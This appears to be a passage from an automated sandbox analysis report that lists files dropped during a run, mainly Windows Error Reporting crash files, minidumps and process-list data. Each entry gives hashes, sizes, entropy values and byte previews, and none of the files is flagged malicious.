                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):0.9943818808352229
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yKhHu1TB0uvduAaKTtrUrzuiFeZ24lO8qH:PHu1TCuvd1aMtr6zuiFeY4lO8qH
                                                                                                                                                                                    MD5:D45C1A555B2817DA85F3713F4D63C65B
                                                                                                                                                                                    SHA1:4A200DC5FAAC6DC613DB079894982D2D11633042
                                                                                                                                                                                    SHA-256:F74FACF634450810433929D3404714B23AAC5E05FFC36150F765C91C4D39F3FE
                                                                                                                                                                                    SHA-512:BE805921C8152F9E6522CFFD53E37B282F62E9AADCD0BB32A98AEDCDC1221836D285181D3B3AA155A72BABCFB644287F0777E3D5FE6F1B27BFC3A22F702CC1E9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.2.1.9.1.8.1.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.3.3.1.6.8.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.0.2.b.c.0.d.-.5.0.0.4.-.4.9.1.3.-.b.0.3.b.-.c.d.0.2.9.2.9.d.b.5.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.2.c.5.6.e.a.-.3.e.a.a.-.4.5.6.e.-.a.5.3.3.-.a.d.0.2.4.2.1.2.0.c.c.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.u.v.i.n.i.p.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.d.4.-.0.0.0.1.-.0.0.1.4.-.d.d.7.3.-.1.7.e.d.4.a.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.7.3.a.1.6.6.0.9.f.9.7.1.d.2.b.d.7.9.b.8.f.0.2.c.7.b.3.6.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.a.5.8.3.b.2.e.0.3.a.c.3.a.7.a.d.6.9.8.e.f.8.7.2.2.f.e.3.0.d.5.b.6.7.f.3.a.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):1.001557588490307
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ot6s1xB0uvduAa+TOPnazuiFeZ24lO8qH:A6s1xCuvd1aaOPazuiFeY4lO8qH
                                                                                                                                                                                    MD5:B68FF65E86E6B6B5A36939AC392BB47F
                                                                                                                                                                                    SHA1:C62BBFC1F76AB1273F9D5ECB6AEAE111F79738DC
                                                                                                                                                                                    SHA-256:E20B854241A8A747E208614DDBE5ADACAD187C01FC247DE94694398F9C4AE50F
                                                                                                                                                                                    SHA-512:D59EFF449E950C2DD8AE78EE0D375F73080E513828393CC4EF0B7059F763828C28F85700A33FD643FEDF9AA6D9D3B5B9DB72574A6D892512746F524E9E96D1D6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.3.2.5.3.8.3.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.8.6.4.4.4.5.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.b.4.b.c.a.b.-.4.1.f.1.-.4.d.9.c.-.8.e.7.a.-.1.e.4.d.f.3.a.b.b.d.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.0.a.7.7.a.f.-.3.7.7.f.-.4.9.b.8.-.b.6.f.8.-.0.d.e.5.c.2.5.a.d.3.a.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.u.v.i.n.i.p.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.8.-.0.0.0.1.-.0.0.1.4.-.4.1.1.5.-.9.0.e.c.4.a.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.7.3.a.1.6.6.0.9.f.9.7.1.d.2.b.d.7.9.b.8.f.0.2.c.7.b.3.6.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.a.5.8.3.b.2.e.0.3.a.c.3.a.7.a.d.6.9.8.e.f.8.7.2.2.f.e.3.0.d.5.b.6.7.f.3.a.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):1.0113301490141229
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:7OzX1ngi0LCDnaKTtrU1zuiFeZ24lO82H:qzX1nGLCDnaMtrczuiFeY4lO82H
                                                                                                                                                                                    MD5:9B45AFDE5D174765AEDBB66D5B1E7119
                                                                                                                                                                                    SHA1:CACC92809F01C560C6BAD4EC9F639A4CF3F2B73A
                                                                                                                                                                                    SHA-256:4EDF974BC2C7C6260FF0B60AB05F687287B0E5826FEFE20A5D87D77C3380FF45
                                                                                                                                                                                    SHA-512:C1EF8398E1530261E8B5135B951F3091E84C615A241389A1FC9E71C9225AF046749C3A4A46C863FEE217976B277E9E86B9031A97881980EFD1D549BF973E649B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.0.8.4.3.8.7.0.7.5.4.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.0.8.4.3.9.4.5.7.5.3.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.3.7.a.0.d.3.-.1.7.6.e.-.4.9.a.e.-.9.f.b.f.-.3.c.0.3.4.a.9.8.a.b.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.0.3.1.9.f.6.-.0.8.1.0.-.4.4.9.f.-.8.6.a.a.-.2.5.1.7.c.8.6.2.d.a.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.u.v.i.n.i.p.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.c.-.0.0.0.1.-.0.0.1.4.-.f.b.a.7.-.b.a.f.7.4.a.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.7.3.a.1.6.6.0.9.f.9.7.1.d.2.b.d.7.9.b.8.f.0.2.c.7.b.3.6.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.a.5.8.3.b.2.e.0.3.a.c.3.a.7.a.d.6.9.8.e.f.8.7.2.2.f.e.3.0.d.5.b.6.7.f.3.a.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 16 streams, Fri May 3 11:13:42 2024, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):427630
                                                                                                                                                                                    Entropy (8bit):3.286424552093867
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:29FUcSWDcEc1CCqQRPX3+vVIc4O3x41lE6CTwlw+/BR:27gxqQRPX3QVIc4oZwl
                                                                                                                                                                                    MD5:365963B3C0DDEB4BC697EFBCAA08691C
                                                                                                                                                                                    SHA1:697AF75B8098C009A2E8B731F9375E3E2AB320CC
                                                                                                                                                                                    SHA-256:3BC8DB089B7A66C8BFCD70EB61992EFB90A2CDF4ED1A0EE61FA46A1E8522E702
                                                                                                                                                                                    SHA-512:584C41759307C80A49F04C69D5A7217A6E495CFA2B295C989208A8F24D5CFD0B94DBCD0B9212F81F4AC4C7689603FA010EA338066E8AE5F0A2A737A063CA3165
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:MDMP..a..... .........4f............................4.......$...........|............L..*z..........l.......8...........T............+..f[..........h8..........T:..............................................................................eJ.......:......Lw......................T.............4f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6570
                                                                                                                                                                                    Entropy (8bit):3.7357822710129334
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RSIU6o7wVetbPncmYxYZMKMkf7ZigaM4Uw89bVBDRf0QvHm:R6l7wVeJPncmY4M0xprw89bVBtf0oHm
                                                                                                                                                                                    MD5:ED6D8275175546795FC05DE7DD5F287B
                                                                                                                                                                                    SHA1:CEE5B38A444A6D2F1DE6D44B72E834BA7A17526D
                                                                                                                                                                                    SHA-256:63A37069D89168CE5716816A36C94F9704F2D7F67CD194EBB4BB455FA9674414
                                                                                                                                                                                    SHA-512:A672AFD911CF4D8BCD032BD96EF45EDFA26CC4F188074790B4BCAA91A244D3F94A9FCAF21F4013DB9D84DF6E753FFB38FDB60E7F16F76D9E6ED8F52E1FBCA6AC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.7.2.<./.P.i.
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4746
                                                                                                                                                                                    Entropy (8bit):4.4931151503691575
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwWl8zscJg771I9rIWpW8VY/PYm8M4JCsG6Fsoyq85N9TyxGvqe0Md:uIjfaI7ch7V2SJCskou9yKqe0Md
                                                                                                                                                                                    MD5:B6D44090967A5BB7F990C3DE1B61E6F2
                                                                                                                                                                                    SHA1:5D8BC3455FDFAB0138D3BFABAD3631A3FE391D3D
                                                                                                                                                                                    SHA-256:034B077C0F4077CBDD7D54DD9788874732F7D112FCB1BDBC9CB061B2DA20B171
                                                                                                                                                                                    SHA-512:B4DD2E7A8D89709703E3945DF81B8E0A082518AD6E29062D2B250E4405E724F3CB14921AD7230F8FD5B6B412243B96893003AB9B2B9C5ED60109423CEBE36E40
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):77208
                                                                                                                                                                                    Entropy (8bit):3.026195018712333
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:sTlE8r96YrvqR2jXZLKokQUSVP+shHu6BzXVjwARle:sTlE8r96YrvqR2jXZLKokQUSVP+shHuV
                                                                                                                                                                                    MD5:FE72CB797C5CA84E4FAFC69ACDE48B46
                                                                                                                                                                                    SHA1:825A36E5EE86163CB4E0AA9B306321DFA0391837
                                                                                                                                                                                    SHA-256:67B78FA114D830E7640361029A9F016DCCE48FBA150D2C955203E6EFEEC7BFBA
                                                                                                                                                                                    SHA-512:DAF99F17D4E47BD1603F105CB8569DDD3E7ABE8909CB96116E274922D5F8B1909B972ECC62B50B3F875AD4685E6EABDE7A1F576F002FAD22EA8ECCA90CC7E1A2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                                    Entropy (8bit):2.683682907582788
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:TiZYWSlu9HYcYNWYHXUYEZDVt8imE2oSCwzUB5amla1MY9JIwi3:2ZDjrpAUPamla1MY92wi3
                                                                                                                                                                                    MD5:F6B918BF59B42F40DBE36A26A64A8F66
                                                                                                                                                                                    SHA1:ECBE7DF6185C79DE63A682970E0990628E0248EB
                                                                                                                                                                                    SHA-256:7A46043514402F9E4DFE612CBD19C3FC7ACCD3DAB239556FADD412B72491BC9F
                                                                                                                                                                                    SHA-512:3C5079AFAC3BFF5542FE8F493008219423B1DADDD4D5B95302F4654E24F0B65D256807D9349ABD1A858D97F5EE8EC08347BBFAECDAB4B063B7CFB00522C05B90
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 16 streams, Fri May 3 11:13:43 2024, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):426668
                                                                                                                                                                                    Entropy (8bit):3.3003807814012838
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:a+EvtKvcC3g/7ub9q1xm3QnqcEm0Ykd4joVX9d3rzdrjRsG:r1qmQn61
                                                                                                                                                                                    MD5:F1F649ADB644B928FAB673D417A3484C
                                                                                                                                                                                    SHA1:AA9F8E5EABEAF619857E5577C7145B08E47F605C
                                                                                                                                                                                    SHA-256:470275585DDB0D5E7A261A2DEF89528C03553F2E064B7F807693588FD0A5FEB7
                                                                                                                                                                                    SHA-512:F0AD9175DC2BFE5729B5B23AE2CDE5CB7AB223A0146D3C6C00CC9275247C929EB35C5BD04A1DB802DA8862774299ABA15B26D78EE5A1CFCBE78283AA37497819
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:MDMP..a..... .........4f............................4.......$...4.......|...X.......TL...z..........l.......8...........T............+..,W...........8...........:..............................................................................eJ......X;......Lw......................T.............4f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8582
                                                                                                                                                                                    Entropy (8bit):3.7093303025917215
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:R6l7wVeJQnr76YvYnHIgmf4M0xprr89baM+fBem:R6lXJQr76Ywogmf4MpaNfB
                                                                                                                                                                                    MD5:93DE5771EA35C34248B44D120427B951
                                                                                                                                                                                    SHA1:6DF3CD781366187F9546793E6A3BB3E13AAF02A4
                                                                                                                                                                                    SHA-256:004F2E055E8279259492FF570B9CFBA939A35E171F1C1B56A5A34B3B50FB3E3B
                                                                                                                                                                                    SHA-512:CFAD7D7853C21F931BDCB3C418C2E961ED0FB0CF5100E45F10EA853AB17BAC02B09057C7459BE7C5F6B2655807A295C410C635D1EE46DD55CED6C364A70BA990
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.6.4.<./.P.i.
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4746
                                                                                                                                                                                    Entropy (8bit):4.496593832836079
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwWl8zscJg771I9rIWpW8VYGYm8M4JCsG6FSyq85N9tcuyxGvqeOMd:uIjfaI7ch7ViJCsKurcuyKqeOMd
                                                                                                                                                                                    MD5:20A4520C72F994668D3839436522C35D
                                                                                                                                                                                    SHA1:3029C6DA3A9FB158B9DE89BBE449743853F65815
                                                                                                                                                                                    SHA-256:A3E7ECA4EAA1CA8971F550A50F7C3E330F6E471455AB16A5349ECA636162AB6B
                                                                                                                                                                                    SHA-512:B974CA1307348599961F6E51EE995C6D342905C1A3EED94F76DBE5E1514284D423101352B61A1472866006D4DE4DDB0BC108C3947C9B0098783E692E79F759D1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):80980
                                                                                                                                                                                    Entropy (8bit):3.0218305174224938
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:JbvSD8pYLkb0JNKXU2L69XM/so+EI5iCTrshOy6BToWmhpa/3buv:JbvSD8pYLkb0JNKXU2L69XM/so+EI5i7
                                                                                                                                                                                    MD5:658BF1BE05079F790B866B856B2111C0
                                                                                                                                                                                    SHA1:5A1D8E47B6FCA1999CB6E2A07C3E7863BB61ACFE
                                                                                                                                                                                    SHA-256:AE9421A97F7A10BE5B02CAB3E4AC598D97F753CB1C8381745A777B938B6ACD59
                                                                                                                                                                                    SHA-512:3C321ED6AF8137CD1770889FA291B0391C947EEC7615B13A320143E55EC0DA44E6608DA6DFFF8CE2F8BCF9706B112FCBAF13B6FF67A130B74AE7888295AE09FE
                                                                                                                                                                                    Malicious:false
